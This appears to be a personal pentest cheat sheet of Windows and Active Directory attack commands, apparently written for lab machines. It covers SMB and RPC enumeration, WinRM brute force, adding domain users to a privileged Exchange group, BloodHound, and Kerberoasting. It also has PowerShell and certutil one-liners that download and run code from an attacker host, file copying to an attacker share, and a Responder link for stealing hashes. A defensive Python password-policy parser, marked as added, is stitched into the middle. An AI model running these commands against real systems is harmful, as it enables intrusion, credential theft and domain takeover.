Windows
Create user and assign to group
net user zolaboo password /add /domain
net group "Exchange Windows Permissions" /add zolaboo
SMB STUFF
LIST SHARES (NULL SESSION)
smbclient -L //10.129.1.39 -N
LOGIN SMB (NULL SESSION)
smbclient "//10.129.1.39/Backups" -N
LIST SHARES (USER)
crackmapexec smb 10.129.1.39 -u "user" -p "password" --shares
smbmap -d DOMAIN -u USERNAME -p PASSWORD -H IP
PASSWORD POLICY
crackmapexec smb IP --pass-pol --> password policy
Account Lockout Threshold: if None, you can try as many times as you want -> BRUTE
FORCE
Reset Account Lockout Counter: --> if the lockout threshold is not None, this tells
the "ban time" (how long until the failed-attempt counter resets)
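Added example (not from the original notes): a small parser for the `--pass-pol` output above that turns the lockout/threshold reasoning into audit findings. The sample output is constructed, and the 12-character minimum-length baseline is an assumption, not a value from these notes.

```python
import re

# Constructed sample of `crackmapexec smb IP --pass-pol` output (not a real capture).
SAMPLE_PASS_POL = """\
SMB  10.0.0.5  445  DC01  [+] Dumping password info for domain: EXAMPLE
SMB  10.0.0.5  445  DC01  Minimum password length: 7
SMB  10.0.0.5  445  DC01  Password history length: 24
SMB  10.0.0.5  445  DC01  Maximum password age: 41 days 23 hours 53 minutes
SMB  10.0.0.5  445  DC01  Reset Account Lockout Counter: 30 minutes
SMB  10.0.0.5  445  DC01  Locked Account Duration: 30 minutes
SMB  10.0.0.5  445  DC01  Account Lockout Threshold: None
"""

# proto, host, port, hostname, then "Key: value"; lines like "[+] Dumping ..." are skipped.
FIELD_RE = re.compile(r"^\S+\s+\S+\s+\d+\s+\S+\s+(?P<key>[A-Za-z ]+?):\s+(?P<value>.+)$")


def parse_pass_pol(text):
    """Return {field: value} for every policy line in crackmapexec-style output."""
    policy = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line.strip())
        if m:
            policy[m.group("key").strip()] = m.group("value").strip()
    return policy


def lockout_threshold(policy):
    """Lockout threshold as an int; 0 means lockout is disabled ('None' in the output)."""
    raw = policy.get("Account Lockout Threshold", "None")
    return 0 if raw.lower() == "none" else int(raw)


def audit_policy(policy, min_length=12):
    """Return findings a defender would raise; min_length is an assumed baseline."""
    findings = []
    threshold = lockout_threshold(policy)
    if threshold == 0:
        findings.append("lockout disabled: unlimited online guessing against every account")
    else:
        reset = policy.get("Reset Account Lockout Counter", "unknown")
        findings.append(f"lockout after {threshold} failures; counter resets after {reset}")
    length = int(policy.get("Minimum password length", "0"))
    if length < min_length:
        findings.append(f"minimum password length {length} is below baseline {min_length}")
    return findings


if __name__ == "__main__":
    for finding in audit_policy(parse_pass_pol(SAMPLE_PASS_POL)):
        print("-", finding)
```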
MOUNT SMB SHARES
sudo mount -t cifs //<vpsa_ip_address>/<export_share> /mnt/<local_share>
MOUNT VHD IMAGE
sudo guestmount --add <vhdfile>.vhd --inspector --ro /mnt/<location> -v
SMB SHARE ON LINUX/WINDOWS
smbserver.py SHARE . -smb2support -username df -password df
TO SEND FILE (ON WINDOWS)
net use \\10.10.14.105\SHARE /u:df df
copy FILENAME \\10.10.14.105\SHARE
FTP SEND FILE
## on attacker machine
python3 -m pyftpdlib 21
## on target
ftp xx.xx.xx.xx
WINDOWS REMOTE
BASIC
rpcclient ip
NULL USER
rpcclient -U '' -N IP
RPCCLIENT COMMANDS
enumdomusers --> lists the users
queryuser USERNAME --> detailed info about a user
querydispinfo --> user details
enumdomgroups --> fetches the groups
querygroup GROUPRID --> fetches a group's details
querygroupmem GROUPRID --> fetches a group's members
WINRM BRUTE FORCE
crackmapexec winrm IP -u USERNAME/FILENAME -p PASSWORD
EVIL-WINRM (SHELL)
evil-winrm -u USER -p PASSWORD -i IP
ENUM SCRIPTS
- https://github.com/GhostPack/Seatbelt (build on different dotnet if needed)
- https://github.com/411Hall/JAWS
- https://github.com/rasta-mouse/Sherlock
- https://github.com/rasta-mouse/Watson
- https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
- https://github.com/AonCyberLabs/Windows-Exploit-Suggester (NO NEED TO EXEC)
POWERSHELL
gci -> (ls)
gci -Force -> (ls -la, includes hidden items; -Hidden alone lists only hidden ones)
gc FILENAME (cat)
net user (list users)
net user USERNAME (info about user)
[environment]::getEnvironmentVariable('PROCESSOR_ARCHITECTURE', 'machine') (arch info)
net user bolazoo password1 /add /domain (add user)
net group "Exchange Windows Permissions" /add bolazoo (add to group)
BLOODHOUND (IN WINDOWS)
runas /netonly /user:active.htb\SVC_TGS cmd
cd C:\Users\Joonas\Downloads\SharpHound3\SharpHound3\bin\Release
SharpHound.exe -c all -d active.htb --domaincontroller 10.129.114.89
BLOODHOUND (LINUX)
cd /usr/bin
./neo4j console
cd ~/Documents/BloodHound-linux-x64
./BloodHound --no-sandbox
AFTER BLOODHOUND (IF SUCCESS) (LINUX)
GetUserSPNs.py -dc-ip 10.129.114.89 -request active.htb/SVC_TGS
KERBEROS ATTACK PATHS
GetNPUsers.py -dc-ip <ip-address> -request '<domain>/' (NULL SESSION)
GetUserSPNs.py -dc-ip <ip-address> -request <domain>/<username> (AUTH)
https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
DOWNLOADING AND EXECUTING FILES
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.98:8000/sherlock.ps1' ) | powershell -noprofile -
echo (New-Object Net.WebClient).DownloadFile('http://10.10.14.98:8000/winPEAS.exe', 'winPEAS.exe') | powershell -noprofile -
certutil -urlcache -split -f http://IP:PORT/filename file.exe
powershell Invoke-WebRequest -UseBasicParsing 10.10.16.8:8000/winPEASx64.exe -OutFile winPEASx64.exe
PLINK (CHISEL LIKE FOR WINDOWS)
https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d
RESPONDER (to phish hashes)
https://github.com/lgandx/Responder